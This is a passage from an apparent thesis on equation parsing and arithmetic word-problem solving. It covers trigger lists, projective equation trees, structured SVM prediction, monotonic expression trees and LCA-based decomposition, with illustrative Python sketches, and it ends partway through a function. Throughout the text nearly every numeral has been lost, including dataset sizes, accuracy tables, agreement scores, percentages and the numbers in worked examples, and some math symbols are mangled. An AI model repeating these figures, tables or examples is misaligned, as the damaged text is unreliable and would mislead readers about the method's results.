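the following python sketch illustrates one possible encoding of triggers and a trigger list for the running example. the class names, field names, and character offsets are our own illustrative choices, and the numeric value of the subtracted constant is a placeholder since it is elided in the text above.

```python
# Illustrative data structures for triggers and a trigger list (names and
# offsets are ours, not from the original implementation). The example mirrors
# "twice a number equals ... less than triple the same number".

from dataclasses import dataclass
from typing import List, Tuple, Union


@dataclass(frozen=True)
class QuantityTrigger:
    value: float            # numeric value of the quantity
    span: Tuple[int, int]   # character span of the mention (illustrative offsets)


@dataclass(frozen=True)
class VariableTrigger:
    label: str              # variable label, e.g. "v1"
    span: Tuple[int, int]   # span of the noun phrase grounding the variable


Trigger = Union[QuantityTrigger, VariableTrigger]
TriggerList = List[Trigger]

# trigger list for the running example: both variable triggers share label "v1",
# but are grounded in different noun phrases ("a number", "the same number")
example_triggers: TriggerList = [
    QuantityTrigger(value=2.0, span=(0, 5)),      # "twice"
    VariableTrigger(label="v1", span=(6, 14)),    # "a number"
    QuantityTrigger(value=8.0, span=(22, 23)),    # placeholder; constant elided above
    QuantityTrigger(value=3.0, span=(34, 40)),    # "triple"
    VariableTrigger(label="v1", span=(41, 56)),   # "the same number"
]
```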
quantity triggers in the trigger list form the quantity trigger list, and the variable triggers in trigger list form the variable trigger list. notation definition quantity trigger mention of a quantity in text variable trigger noun phrase coupled with variable label trigger quantity or variable trigger quantity trigger list list of quantity triggers, one for each number mention in equation variable trigger list list of variable triggers, one for each variable mention in equation trigger list union of quantity and variable trigger list equation tree binary tree representation of equation lc(n), rc(n) left and right child of node n expr(n) expression represented by node n �(n) operation at node n order(n) order of operation at node n location(n) character offset of trigger representing leaf node n span-start(n), span-end(n) start and end character offsets of span covered by node n table . : summary of notations used in this chapter equation tree an equation tree of a sentence x is a binary tree whose leaves constitute the trigger list of x, and internal nodes (except the root) are labeled with one of the following operations – addition, subtraction, multiplication, division. in addition, for nodes which are labeled with subtraction or division, we maintain a separate variable to determine order of its children. the root of the tree is always labeled with the operation equal. an equation tree is a natural representation for an equation. each node n in an equation tree represents an expression expr(n), and the label of the parent node determines how the expressions of its children are to be composed to construct its own expression. let us denote the label for a non-leaf node n to be �(n), where �(n) ∈ {+,−,×,÷, =} and the order of a node n’s children by order(n) (defined only for subtraction and division nodes), which takes values lr (left-right) or rl (right-left). for a leaf node n, the expression expr(n) represents the variable label, if n is a variable trigger, and the numeric value of the quantity, if it is a quantity trigger. finally, we use lc(n) and rc(n) to represent the left and right child of node n, respectively. the equation represented by the tree can be generated as follows. for all non-leaf nodes n, we have expr(n) =   expr(lc(n))�(n) expr(rc(n)) if �(n) ∈{+,×, =} expr(lc(n))�(n) expr(rc(n)) if �(n) ∈{−,÷}∧order(n) = lr expr(rc(n))�(n) expr(lc(n)) if �(n) ∈{−,÷}∧order(n) = rl ( . ) given an equation tree t of a sentence, the equation represented by it is the expression generated by the root of t (following equation . ). referring to the equation tree in fig . , the node marked “−r” represents ( ×v ) − , and the root represents the full equation ×v = ( ×v ) − . . projectivity for each leaf n of an equation tree t , we define a function location(·), to indicate the position of the corresponding trigger in text. we also define for each node n of equation tree t , functions span-start(n) and span-end(n) to denote the minimum span of text containing the leaves of the subtree rooted at n. we define them as follows: span-start(n) =   location(n) if n is a leaf min(span-start(lc(n)),span-start(rc(n))) otherwise span-end(n) =   location(n) if n is a leaf max(span-end(lc(n)),span-end(rc(n))) otherwise an equation tree t is called projective iff for every node n of t , either span-end(lc(n)) ≤ span-start(rc(n)) or span-end(rc(n)) ≤ span-start(lc(n)). 
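the recursive definitions of expr(·), span-start(·), span-end(·) and projectivity translate directly into code; the sketch below is one such translation, with a node class of our own design. the root '=' node is handled separately, since it relates rather than combines its children's expressions.

```python
# Sketch of the recursive definitions above: evaluating the expression at each
# node, computing span-start/span-end, and testing projectivity. The Node class
# is an illustrative encoding of our own.

import operator
from dataclasses import dataclass
from typing import Optional, Union

OPS = {"+": operator.add, "-": operator.sub, "*": operator.mul, "/": operator.truediv}


@dataclass
class Node:
    op: Optional[str] = None                 # '+', '-', '*', '/', '=' at internal nodes
    order: str = "LR"                        # 'LR' or 'RL'; used for '-' and '/'
    value: Union[None, float, str] = None    # number or variable label at a leaf
    location: Optional[int] = None           # character offset of the trigger (leaves)
    left: Optional["Node"] = None
    right: Optional["Node"] = None

    def is_leaf(self) -> bool:
        return self.left is None and self.right is None


def expr(n: Node, assignment: dict) -> float:
    """Evaluate expr(n) for nodes below the root; variables come from `assignment`."""
    if n.is_leaf():
        return assignment[n.value] if isinstance(n.value, str) else n.value
    a, b = expr(n.left, assignment), expr(n.right, assignment)
    if n.op in ("-", "/") and n.order == "RL":
        a, b = b, a                          # order RL: apply the operation right-to-left
    return OPS[n.op](a, b)


def equation_holds(root: Node, assignment: dict) -> bool:
    """The root is labeled '='; it relates the expressions of its two children."""
    assert root.op == "="
    return expr(root.left, assignment) == expr(root.right, assignment)


def span_start(n: Node) -> int:
    return n.location if n.is_leaf() else min(span_start(n.left), span_start(n.right))


def span_end(n: Node) -> int:
    return n.location if n.is_leaf() else max(span_end(n.left), span_end(n.right))


def is_projective(n: Node) -> bool:
    """True iff, at every node, the spans of the two children do not intersect."""
    if n.is_leaf():
        return True
    ok_here = (span_end(n.left) <= span_start(n.right)
               or span_end(n.right) <= span_start(n.left))
    return ok_here and is_projective(n.left) and is_projective(n.right)
```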
in other words, the span of the left child and the right child cannot intersect in a projective equation tree. the key observation, as our corpus analysis indicates, is that for most sentences there exists a trigger list such that the equation tree representing the relation in the sentence is projective (this is more general than the definition of projective trees used in dependency parsing [mcdonald et al., ]). however, this might involve mapping two mentions of the same variable to different noun phrases. figure . shows an example of a projective equation tree, which requires different mentions of v to be mapped to different noun phrases. if we had mapped both mentions of v to the same noun phrase "a number", the resulting equation tree would not have been projective. we collected sentences which represent an equation with one or two mentions of variables, and each number in the sentence used at most once in the equation. we found that only one sentence among these could not generate a projective equation tree (see section . . for details on dataset creation). therefore, we develop an algorithmic approach for predicting projective equation trees, and show empirically that it compares favorably with ones which do not make the projective assumption.

. predicting equation parse

equation parsing of a sentence involves predicting three components – quantity trigger list, variable trigger list and equation tree. we develop three structured prediction modules to predict each of the above components. all our prediction modules take a similar form: given input x and output y, we learn a scoring function f_w(x,y), which scores how likely the output y is given input x. the scoring function is linear, f_w(x,y) = w^T φ(x,y), where φ(x,y) is a feature vector extracted from x and y. the inference problem, that is, the prediction y* for an input x, is then y* = arg max_{y ∈ Y} f_w(x,y), where Y is the set of all allowed values of y.

. . predicting quantity trigger list

given input text and the quantities mentioned in it, the role of this step is to identify, for each quantity in the text, whether it should be part of the final equation. for instance, in example . in section . , both " " and " " are not relevant for the final equation "v + v = ". similarly, in example . , the number "two" is irrelevant for the equation "v + v = ". we define for each quantity q in the sentence a boolean value relevance(q), which is set to true if q is relevant for the final equation, and to false otherwise. for the structured classification, the input x is the sentence along with a set of recognized quantities mentioned in it, and the output y is the relevance values for all quantities in the sentence. we empirically found that predicting all relevance values jointly performs better than having a binary classifier predict each one separately. the feature function φ(x,y) used for the classification generates the following features:

. neighborhood features: for each quantity q in the input sentence, we add unigrams and bigrams generated from a window around q, and part-of-speech tags of neighborhood tokens of q. we conjoin these features with relevance(q).
. quantity features: for each quantity q, we add unigrams and bigrams of the phrase representing the quantity. also, we add a feature indicating whether the number is associated with number one or two, and whether it is the only number present in the sentence. these features are also conjoined with relevance(q).

. .
predicting variable trigger list the goal of this step is to predict the variable trigger list for the equation. our structured classifier takes as input the sentence x, and the output y is either one or two noun-phrases, representing variables in the final equation. as we pointed out earlier, multiple groundings might be valid for any given variable, hence there can be multiple valid variable trigger lists. for every sentence x, we construct a set y of valid outputs. each element in y corresponds to a valid variable trigger list. finally, we aim to output only one of the elements of y . we modified the standard structured prediction algorithm to consider “superset supervision” and take into account multiple gold structures for an input x. we assume access to n training examples of the form : (x ,y ), (x ,y ), . . . , (xn,yn ), where each yi is a set of valid outputs for the sentence xi. since we want to output only one variable trigger list, we want to score at least one y from yi higher than all other possible outputs, for each xi. we use a modified latent structured svm to learn the weight vector w. the algorithm treats the best choice among all of yi as a latent variable. at each iteration, for all xi, the algorithm chooses the best choice y∗i from the set yi, according to the weight vector w. then, w is updated by learning on all (xi,y ∗ i ) by a standard structured svm algorithm. the details of the algorithm are in algorithm . algorithm structural svm with superset supervision input: training data t = {(x ,y ), (x ,y ), . . . , (xn,yn )} output: trained weight vector w : w ← w : repeat : t ′ ←∅ : for all (xi,yi) ∈ t do : y∗i ← arg maxy∈yi wt φ(xi,y) : t ′ ← t ′ ∪{(xi,y∗i )} : end for : update w by running standard structural svm algorithm on t ′ : until convergence : return w the distinction from standard latent structural svm is in line of algorithm . in order to get the best choice y∗i for input xi, we search only inside yi, instead of all of y. a similar formulation can be found in [björkelund and kuhn, ]. the features φ(x,y) used for variable trigger prediction are as follows: . variable features : unigrams and bigrams generated from the noun phrase representing variables, part of speech tags of tokens in noun phrase representing variables. . neighborhood features : unigrams and pos tags from neighborhood of variables. all the above features are conjoined with two labels, one denoting whether y has two variables or one, and the second denoting whether y has two variables represented by the same noun phrase. if the output of the classifier is a pair of noun phrases, we use a rule based variable coreference detector, to determine whether both noun phrases should have the same variable label or not. the rules for variable coreference are as follows : . if both noun phrases are the same, and they do not have the token “two” or “ ”, they have the same label. . if the noun phrases are different, and the noun phrase appearing later in the sentence contains tokens “itself”, “the same number”, they have the same label. . in all other cases, they have different labels. finally, each noun phrase contributes one variable trigger to the variable trigger list. . . predicting equation tree it is natural to assume that the syntactic parse of the sentence could be very useful in addressing all the predictions we are making in the equation parsing tasks. 
however, it turns out that this is not the case – large portions of the syntactic parse will not be part of the equation parse, hence we need the aforementioned modules to address this. nevertheless, in the next task of predicting the equation tree, we attempted to constraint the output space using guidance from the syntactic tree; we found, though, that even enforcing this weak level of output expectation is not productive. this was due to the poor performance of current syntactic parsers on the equation data (eg., in % of sentences, the stanford parser made a mistake which does not allow recovering the correct equation). the tree prediction module receives the trigger list predicted by the previous two modules, and the goal is to create an equation tree using the trigger list as the leaves of that tree. the input x is the sentence and the trigger list, and the output y is the equation tree representing the relation described in the sentence. we assume that the output will be a projective equation tree. for features φ(x,y), we extract for each non-leaf node n of the equation tree y, the following: . neighborhood features : unigrams, bigrams and pos tags from neighborhood of span-start(lc(n)), span-start(rc(n)), span-end(lc(n)) and span-end(rc(n)), conjoined with �(n) and order(n). . connecting text features : unigrams, bigrams and part of speech tags between min(span-end(lc(n)),span-end(rc(n))) and max(span-start(lc(n)), span-start(rc(n))), conjoined with �(n) and order(n). . number features : in case we are combining two leaf nodes representing quantity triggers, we add a feature signifying whether one number is larger than the other. the projectivity assumption implies that the final equation tree can be generated by combining only adjacent nodes, once the set of leaves is sorted based on span-start(·) values. this allows us to use cky algorithm for inference. a natural approach to further reduce the output space is to conform to the projective structure of the syntactic parse of the sentence. however, we found this to adversely affect performance, due to the poor performance of syntactic parser on equation data. lexicon to bootstrap the equation parsing process, we developed a high precision lexicon to translate mathematical expressions to operations and orders, like “sum of a and b” translates to “a+b”, “a minus b” translates to “a-b”, etc. (where a and b denote placeholder numbers or expressions). at each step of cky, while constructing a node n of the equation tree, we check for a lexicon text expression corresponding to node n. if found, we allow only the corresponding operation (and order) for node n, and do not explore other operations or orders. we show empirically that reducing the space using this greedy lexicon matching help improve performance. we found that using the lexicon rules as features instead of hard constraints do not help as much. note that our lexicon comprises only generic math concepts, and around % of the sentences in our dataset do not contain any pattern from the lexicon. details of the lexicon are added to the appendix. finally, given input sentence, we first predict the quantity trigger and the variable trigger lists. given the complete trigger list, we predict the equation tree relating the components of the trigger list. . . alternatives a natural approach could be to jointly learn to predict all three components, to capture the dependencies among them. 
to investigate this, we developed a structured svm which predicts all components jointly, using the union of the features of each component. we use approximate inference, first enumerating possible trigger lists, and then equation trees, and find the best scoring structure. however, this method did not outperform the pipeline method. the worse performance of joint learning is due to: ( ) search space being too large for the joint model to do well given our dataset size of , and ( ) our independent classifiers being good enough, thus supporting better joint inference. this tradeoff is strongly supported in the literature [punyakanok et al., b, sutton and mccallum, ]. another option is to enforce constraints between trigger list predictions, such as, variable triggers should not overlap with the quantity triggers. however, we noticed that often noun phrases returned by the stanford parser were noisy, and would include neighboring numbers within the extracted noun phrases. this prevented us from enforcing such constraints. . experimental results we now describe the data set, and the annotation procedure used. we then evaluate the system’s performance on predicting trigger list, equation tree, and the complete equation parse. . . dataset we created a new dataset consisting of sentences extracted from algebra word problems and financial news headlines. for algebra word problems, we used the mit dataset [kushman et al., ], and two high school mathematics textbooks, elementary algebra (college of redwoods) and beginning and intermediate algebra (tyler wallace). financial news headlines were extracted from the latest news feed of marketwatch, over the month of february, . all sentences with information describing a mathematical relation among at most two (possibly coreferent) variables, were chosen. next, we pruned sentences which require multiple uses of a number to create the equation. this only removed a few time related sentences like “in years, john will be twice as old as his son.”. we empirically found that around % of sentences describing a relation fall under the scope of our dataset. some statistics of the dataset are provided in table . . source #sentences mit redwoods wallace marketwatch table . : statistics of dataset the annotators were shown each sentence paired with the normalized equation representing the relation in the sentence. for each variable in the equation, the annotators were asked to mark spans of text which best describe what the variable represents. they were asked to annotate associated entities if exact variable description was not present. for instance, in example . (section ), the relation holds between the speed of bird and the speed of wind. however, “speed” is not explicitly mentioned in the sentence. in such cases, the annotators were asked to annotate the associated entities “the wind” and “a bird” as representing variables. the guidelines also directed annotators to choose the longest possible mention, in case they feel the mention boundary is ambiguous. as a result, in the sentence, “city rentals rent an intermediate-size car for . dollars plus . per mile.”, the phrase “city rentals rent an intermediate-size car” was annotated as representing variable. we allow multiple mentions to be annotated for the same variable. in example . (section ), both “a number” and “the same number” were annotated as representing the same variable. we wanted to consider only noun phrase constituents for variable grounding. 
therefore, for each anno- tated span, we extracted the noun phrase with maximum overlap with the span, and used it to represent the variables. finally, a tuple with each variable being mapped to one of the noun phrases representing it, forms a valid output grounding (variable trigger list). we computed inter-annotator agreement on the final annotations where only noun phrases represent variables. the agreement (kappa) was . , indicating good agreement. the average number of mention annotations per sentence was . . . . equation parsing modules in this section, we evaluate the performance of the individual modules of the equation parsing process. we report accuracy - the fraction of correct predictions. tables . , . and . show the -fold cross validation accuracy of the various modules. in each case, we also report accuracy by removing each feature group, one at a time. in addition, for equation tree prediction, we also show the effect of lexicon, projectivity, conforming to syntactic parse constraints, and using lexicon as features instead of hard constraints. for all our experiments, we use the stanford parser [chen and manning, ], the illinois pos tagger [roth and zelenko, ], the illinois shallow parser [punyakanok and roth, ] and the illinois-sl structured prediction package [chang et al., ]. accuracy all features . no neighborhood features . no quantity features . table . : performance of quantity trigger list prediction accuracy all features . no variable features . no neighborhood features . table . : performance of variable trigger list prediction accuracy all features . no neighborhood features . no connecting text features . no number features . no lexicon . no projectivity . conform with syntactic parse . lexicon as features . table . : performance of equation tree prediction . . equation parsing results in this section, we evaluate the performance of our system on the overall equation parsing task. we report equation accuracy - the fraction of sentences for which the system got the equation correct, and equa- tion+grounding accuracy - the fraction of sentences for which the system got both the equation and the grounding of variables correct. table . shows the overall performance of our system, on a -fold cross validation. we compare against joint learning - a system which jointly learns to predict all relevant com- ponents of an equation parse (section . . ). we also compare with spf [artzi and zettlemoyer, ], a publicly available semantic parser, which can learn from sentence-logical form pairs. we train spf with sentence-equation pairs and a seed lexicon for mathematical terms (similar to ours), and report equation accuracy. our structured predictors pipeline approach is shown to be superior to both joint learning and spf. source equation accuracy equation + grounding accuracy our system . ± . . ± . joint learning . ± . . ± . spf . n/a table . : performance on equation parsing spf gets only a few sentences correct. we attribute this to the inability of spf to handle overlapping mentions (like in example . ), as well as its approach of parsing the whole sentence to the final output form. the developers of spf also confirmed that it is not suitable for equation parsing and that these results are expected. since equation parsing is a more involved process, a slight adaptation of spf does not seem possible, necessitating a more involved process , of the type we propose. 
our approach, in contrast to spf, can handle overlapping mentions, selects triggers from text, and parses the trigger list to form equations. . . error analysis for variable trigger list prediction, around % of the errors were due to the predictor choosing a span which is contained within the correct span, e.g., when the target noun phrase is “the cost of a child’s ticket”, our predictor chose only “child’s ticket”. although this choice might be sufficient for downstream tasks, we consider it to be incorrect in our current evaluation. another % of the errors were due to selection of entities which do not participate in the relation. for example, in “a rancher raises times as many cows as horses.”, our predictor chose “a rancher” and “cows” as variables, whereas the relation exists between “cows” and “horses”. for the prediction of the equation tree, we found that % of the errors were due to rare math concepts expressed in text. for example, “ dollars short of the price” represents dollars should be subtracted from the price. these errors can be handled by carefully augmenting the lexicon. another % of the errors were due to lack of world knowledge, requiring understanding of time, speed, and distance. . conclusion in this chapter, we investigate methods that identify and understand mathematical relations expressed in text. we introduce the equation parsing task, which involves generating an equation from a sentence and identifying what the variables represent. we define the notion of projectivity, and construct a high precision lexicon, and use these to reduce the equation search space. our experimental results are quite satisfying and raise a few interesting issues. in particular, it suggests that predicting equation parses using a pipeline of structured predictors performs better than jointly trained alternatives. as discussed, it also points out the limitation of the current nlp tools in supporting these tasks. code and dataset are available at http://cogcomp.cs.illinois.edu/page/publication_view/ . private communication http://cogcomp.cs.illinois.edu/page/publication_view/ chapter arithmetic word problems . introduction in this chapter, we expand our focus on quantitative reasoning over multiple numbers mentioned across different sentences. as a test bed, we choose the task of automatically solving arithmetic word problems. we found these problems to be a good abstraction of the challenges faced in quantitative reasoning across multiple sentences. word problems arise naturally when reading the financial section of a newspaper, or following election coverage. these problems pose an interesting challenge to the nlp community, due to its concise and relatively straightforward text, and seemingly simple semantics. arithmetic word problems are usually directed towards elementary school students, and can be solved by combining the numbers mentioned in text with basic operations (addition, subtraction, multiplication, division). they are simpler than algebra word problems which require students to identify variables, and form equations with these variables to solve the problem. initial methods to address arithmetic word problems have mostly focused on subsets of problems, re- stricting the number or the type of operations used [roy et al., , hosseini et al., ] but could not deal with multi-step arithmetic problems involving all four basic operations. 
the template based method of [kushman et al., ], on the other hand, can deal with all types of problems, but implicitly assumes that the solution is generated from a set of predefined equation templates. in this chapter, we present a novel approach which can solve a general class of arithmetic problems without predefined equation templates. in particular, it can handle multiple step arithmetic problems as shown in example . . example . gwen was organizing her book case making sure each of the shelves had exactly books on it. she has types of books - mystery books and picture books. if she had shelves of mystery books and shelves of picture books, how many books did she have in total? the solution involves understanding that the number of shelves needs to be summed up, and that the total number of shelves needs to be multiplied by the number of books each shelf can hold. in addition, one has to understand that the number “ ” is not a direct part of the solution of the problem. while a solution to these problems eventually requires composing multi-step numeric expressions from text, we believe that directly predicting this complex expression from text is not feasible. at the heart of our technical approach is the novel notion of an expression tree. we show that the arithmetic expressions we are interested in can always be represented using an expression tree that has some unique decomposition properties. this allows us to decompose the problem of mapping the text to the arithmetic expression to a collection of simple prediction problems, each determining the lowest common ancestor operation between a pair of quantities mentioned in the problem. we then formulate the decision problem of composing the final expression tree as a joint inference problem, via an objective function that consists of all these decomposed prediction problems, along with legitimacy and background knowledge constraints. learning to generate the simpler decomposed expressions allows us to support effectively support quan- titative reasoning over multiple numbers, and allows generalization across problems types. in particular, our system could solve example . even though it has never seen a problem that requires both addition and multiplication operations. we also introduce a second concept, that of quantity schema, that allows us to focus on the information relevant to each quantity mentioned in the text. we show that features extracted from quantity schemas help reasoning effectively about the solution. moreover, quantity schemas help identify unnecessary text snippets in the problem text. for instance, in example . , the information that “tom washed cars over the weekend” is irrelevant; he could have performed any activity to earn money. in order to solve the problem, we only need to know that he had $ last week, and now he has $ . example . last week tom had $ . he washed cars over the weekend and now has $ . how much money did he make from the job? we combine the classifiers’ decisions using a constrained inference framework that allows for incorporating world knowledge as constraints. for example, we deliberatively incorporate the information that, if the problems asks about an “amount”, the answer must be positive, and if the question starts with “how many”, the answer will most likely be an integer. our system is evaluated on two existing datasets of arithmetic word problems, achieving state of the art performance on both. 
we also create a new dataset of multistep arithmetic problems, and show that our system achieves competitive performance in this challenging evaluation setting. the next section describes the related work in the area of automated math word problem solving. we then present the theory of expression trees and our decomposition strategy that is based on it. sec. presents the overall computational approach, including the way we use quantity schemas to learn the mapping from text to expression tree components. finally, we discuss our experimental study and conclude. . related work work in automated arithmetic problem solvers has focused on a restricted subset of problems. the system described in [hosseini et al., , mitra and baral, ] handles only addition and subtraction problems, and requires additional annotated data for verb categories. in contrast, our system does not require any addi- tional annotations and can handle a more general category of problems. the approach in [roy et al., ] supports all four basic operations, and uses a pipeline of classifiers to predict different properties of the problem. however, it makes assumptions on the number of quantities mentioned in the problem text, as well as the number of arithmetic steps required to solve the problem. in contrast, our system does not have any such restrictions, effectively handling problems mentioning multiple quantities and requiring multiple steps. kushman’s approach to automatically solving algebra word problems [kushman et al., ] might be the most related to ours. it tries to map numbers from the problem text to predefined equation templates. however, they implicitly assume that similar equation forms have been seen in the training data. in contrast, our system can perform competitively, even when it has never seen similar expressions in training. there is a recent interest in understanding text for the purpose of solving scientific and quantitative problems of various kinds. our approach is related to work in understanding and solving elementary school standardized tests [clark, ]. the system described in [berant et al., ] attempts to automatically answer biology questions, by extracting the structure of biological processes from text. there has also been efforts to solve geometry questions by jointly understanding diagrams and associated text [seo et al., ]. our constrained inference module falls under the general framework of constrained conditional models (ccm) [chang et al., ]. in particular, we use the l+i scheme of ccms, which predicts structured out- put by independently learning several simple components, combining them at inference time. this has been successfully used to incorporate world knowledge at inference time, as well as getting around the need for large amounts of jointly annotated data for structured prediction [roth and yih, , punyakanok et al., a, punyakanok et al., , clarke and lapata, , barzilay and lapata, , roy et al., ]. . expression tree and problem decomposition we address the problem of automatically solving arithmetic word problems. the input to our system is the problem text p , which mentions n quantities q ,q , . . . ,qn. our goal is to map this problem to a read- once arithmetic expression e that, when evaluated, provides the problem’s solution. we define a read-once arithmetic expression as one that makes use of each quantity at most once. 
we say that e is a valid expression, if it is such a read-once arithmetic expression, and we only consider in this work problems that can be solved using valid expressions (it’s possible that they can be solved also with invalid expressions). an expression tree t for a valid expression e is a binary tree whose leaves represent quantities, and each internal node represents one of the four basic operations. for a non-leaf node n, we represent the operation associated with it as �(n), and its left and right child as lc(n) and rc(n) respectively. the numeric value of the quantity associated with a leaf node n is denoted as q(n). each node n also has a value associated with it, represented as val(n), which can be computed in a recursive way as follows: val(n) =   q(n) if n is a leaf val(lc(n))�(n) val(rc(n)) otherwise ( . ) for any expression tree t for expression e with root node nroot, the value of val(nroot) is exactly equal to the numeric value of the expression e. therefore, this gives a natural representation of numeric expressions, providing a natural parenthesization of the numeric expression. fig . shows an example of an arithmetic problem with solution expression and an expression tree for the solution expression. problem gwen was organizing her book case making sure each of the shelves had exactly books on it. she has types of books - mystery books and picture books. if she had shelves of mystery books and shelves of picture books, how many books did she have total? solution ( + ) × = expression tree of solution + × figure . : an arithmetic word problem, solution expression and the corresponding expression tree definition an expression tree t for a valid expression e is called monotonic if it satisfies the following conditions: . if an addition node is connected to a subtraction node, then the subtraction node is the parent. . if a multiplication node is connected to a division node, then the division node is the parent. . two subtraction nodes cannot be connected to each other. . two division nodes cannot be connected to each other. fig . shows two different expression trees for the same expression. fig . b is monotonic whereas fig . a is not. our decomposition relies on the idea of monotonic expression trees. we try to predict for each pair of quantities qi,qj, the operation at the lowest common ancestor (lca) node of the monotonic expression tree for the solution expression. we also predict for each quantity, whether it is relevant to the solution. finally, an inference module combines all these predictions. + − × + (a) + − × + (b) figure . : two different expression trees for the numeric expression ( × ) + − − . the right one is monotonic, whereas the left one is not. in the rest of the section, we show that for any pair of quantities qi,qj in the solution expression, any monotonic tree for the solution expression has the same lca operation. therefore, predicting the lca operation becomes a multiclass classification problem. the reason that we consider the monotonic representation of the expression tree is that different trees could otherwise give different lca operation for a given pair of quantities. for example, in fig . , the lca operation for quantities and can be + or −, depending on which tree is considered. definition we define an addition-subtraction chain of an expression tree to be the maximal connected set of nodes labeled with addition or subtraction. the nodes of an addition-subtraction (as) chain c represent a set of terms being added or subtracted. 
these terms are sub-expressions created by the subtrees rooted at neighboring nodes of the chain. we call these terms the chain terms of c, and the whole expression, after the node operations have been applied to the chain terms, the chain expression of c. for example, in fig . , the shaded nodes form an addition-subtraction chain. the chain expression is ( × ) + − −, and the chain terms are ×, , and . we define a multiplication-division (md) chain in a similar way.

theorem . . . every valid expression can be represented by a monotonic expression tree.

proof. the proof is procedural, that is, we provide a method to convert any expression tree into a monotonic expression tree for the same expression. consider a non-monotonic expression tree e, and without loss of generality, assume that the first condition for monotonicity does not hold. therefore, there exists an addition node ni and a subtraction node nj such that ni is the parent of nj. consider an addition-subtraction chain c which includes ni and nj. we now replace the nodes of c and its subtrees in the following way. we add a single subtraction node n−. the left subtree of n− has all the addition chain terms connected by addition nodes, and the right subtree of n− has all the subtraction chain terms connected by addition nodes. both subtrees of n− only require addition nodes, hence the monotonicity condition is satisfied. we can construct the monotonic tree in fig . b from the non-monotonic tree of fig . a using this procedure. the addition chain terms are × and , and the subtraction chain terms are and . as described above, we introduce the root subtraction node in fig . b and attach the addition chain terms to the left and the subtraction chain terms to the right. the same line of reasoning can be used to handle the second condition, with multiplication and division replacing addition and subtraction, respectively.

theorem . . . consider two valid expression trees t1 and t2 for the same expression e. let c1 and c2 be the chains containing the root nodes of t1 and t2 respectively. the chain type (addition-subtraction or multiplication-division) as well as the set of chain terms of c1 and c2 are identical.

proof. we first prove that the chains containing the roots are both as or both md, and then show that the chain terms are also identical. we prove by contradiction that the chain type is the same. let c1's type be "addition-subtraction" and c2's type be "multiplication-division" (without loss of generality). since both c1 and c2 generate the same expression e, e can be represented as a sum (or difference) of two expressions as well as a product (or division) of two expressions. transforming a sum (or difference) of expressions into a product (or division) requires taking common terms from the expressions, which implies that the sum (or difference) had duplicate quantities. the opposite transformation adds the same term to several expressions, leading to multiple uses of the same quantity. therefore, at least one of c1 and c2 must use the same quantity more than once, violating validity.

we now need to show that the individual chain terms are also identical. without loss of generality, assume that both c1 and c2 are "addition-subtraction" chains, and suppose the chain terms of c1 and c2 are not identical. the chain expression for both chains is the same (since they are root chains, the chain expression has to be the same as e).
let the chain expression for c1 be ∑i ti − ∑i t′i, where the ti are the addition chain terms and the t′i are the subtraction chain terms. similarly, let the chain expression for c2 be ∑i si − ∑i s′i. we know that ∑i ti − ∑i t′i = ∑i si − ∑i s′i, but the set of ti and t′i is not the same as the set of si and s′i. however, it should be possible to transform one form into the other using mathematical manipulations. this transformation will involve taking common terms, or multiplying two terms, or both. following the previous explanation, this will force one of the expressions to have duplicate quantities, violating validity. hence, the chain terms of c1 and c2 are identical.

consider an expression tree t for a valid expression e. for a distinct pair of quantities qi, qj participating in expression e, we denote by ni, nj the leaves of the expression tree t representing qi, qj, respectively. let nlca(qi,qj;t) be the lowest common ancestor node of ni and nj. we also define order(qi,qj;t) to be true if ni appears in the left subtree of nlca(qi,qj;t) and nj appears in the right subtree of nlca(qi,qj;t), and false otherwise. finally, we define ⊙lca(qi,qj;t) for a pair of quantities qi, qj as follows:

\odot_{lca}(q_i,q_j,t) = \begin{cases}
+ & \text{if } \odot(n_{lca}(q_i,q_j;t)) = + \\
\times & \text{if } \odot(n_{lca}(q_i,q_j;t)) = \times \\
- & \text{if } \odot(n_{lca}(q_i,q_j;t)) = - \text{ and } order(q_i,q_j;t) = \text{true} \\
-_{reverse} & \text{if } \odot(n_{lca}(q_i,q_j;t)) = - \text{ and } order(q_i,q_j;t) = \text{false} \\
\div & \text{if } \odot(n_{lca}(q_i,q_j;t)) = \div \text{ and } order(q_i,q_j;t) = \text{true} \\
\div_{reverse} & \text{if } \odot(n_{lca}(q_i,q_j;t)) = \div \text{ and } order(q_i,q_j;t) = \text{false}
\end{cases}   ( . )

definition. given two expression trees t1 and t2 for the same expression e, t1 is lca-equivalent to t2 if for every pair of quantities qi, qj in the expression e, we have ⊙lca(qi,qj,t1) = ⊙lca(qi,qj,t2).

theorem . . . all monotonic expression trees for an expression are lca-equivalent to each other.

proof. we prove this by induction on the number of quantities used in an expression. for all expressions e with quantities, there exists only one monotonic expression tree, and hence the statement is trivially true. this is our base case. for the inductive case, we assume that the theorem holds for all expressions with k < n quantities, and we prove that any expression with n quantities also satisfies the property. consider a valid expression e with monotonic expression trees t1 and t2. from theorem . . , we know that the chains containing the roots of t1 and t2 have identical type and terms. given two quantities qi, qj of e, their lowest common ancestor will either belong to the chain containing the root in both t1 and t2, or belong to one of the chain terms in both. if the lca node is part of the root chain in both t1 and t2, the monotonicity property ensures that the lca operation is identical. if the lca node is part of a chain term (which is an expression tree of size less than n), the property is satisfied by the induction hypothesis.

the theory just presented shows that it is possible to uniquely decompose the overall problem into simpler steps, and this will be exploited in the next section.

. mapping problems to expression trees

given the uniqueness properties proved in sec. . , it is sufficient to identify the operation between any two relevant quantities in the text in order to determine the unique valid expression.
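to make the preceding notions concrete, the following is a minimal sketch (in python) of expression trees, their recursive evaluation, the monotonicity test, and the lca operation defined above; the Node class and the helper names are illustrative assumptions made for exposition, not the representation used by the actual solver.

# sketch of the notions above: expression trees, their evaluation, monotonicity,
# and the lca operation. the Node class and helper names are illustrative
# assumptions, not the representation used by the actual solver.

class Node:
    def __init__(self, op=None, left=None, right=None, value=None):
        self.op = op          # '+', '-', '*' or '/' for internal nodes, None for leaves
        self.left = left
        self.right = right
        self.value = value    # the numeric value q(n) for a leaf

    def is_leaf(self):
        return self.op is None

def val(n):
    # recursive evaluation, mirroring the definition of val(n)
    if n.is_leaf():
        return n.value
    ops = {'+': lambda a, b: a + b, '-': lambda a, b: a - b,
           '*': lambda a, b: a * b, '/': lambda a, b: a / b}
    return ops[n.op](val(n.left), val(n.right))

def is_monotonic(n):
    # checks the four parent-child conditions of the monotonicity definition
    if n.is_leaf():
        return True
    for child in (n.left, n.right):
        if not child.is_leaf():
            if n.op == '+' and child.op == '-':    # subtraction must be the parent
                return False
            if n.op == '*' and child.op == '/':    # division must be the parent
                return False
            if n.op == '-' and child.op == '-':    # no two connected subtractions
                return False
            if n.op == '/' and child.op == '/':    # no two connected divisions
                return False
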